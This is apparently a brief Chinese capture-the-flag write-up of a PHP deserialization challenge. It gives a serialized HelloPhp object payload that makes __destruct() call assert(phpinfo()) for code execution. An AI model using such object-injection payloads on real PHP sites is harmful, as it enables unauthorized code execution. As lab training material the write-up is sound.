题目
先按F12查看源码,找到线索
访问
应该是反序列化题目
找到漏洞点unserialize($_GET["data"])以通过控制data参数,构造恶意的序列化数据,利用__destruct()方法的动态函数调用执行任意代码
这里可以构造变量a—>phpinfo(),变量b—>assert;组合起来后—>assert(phpinfo())
构造payload
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
输入payload查看
找到flag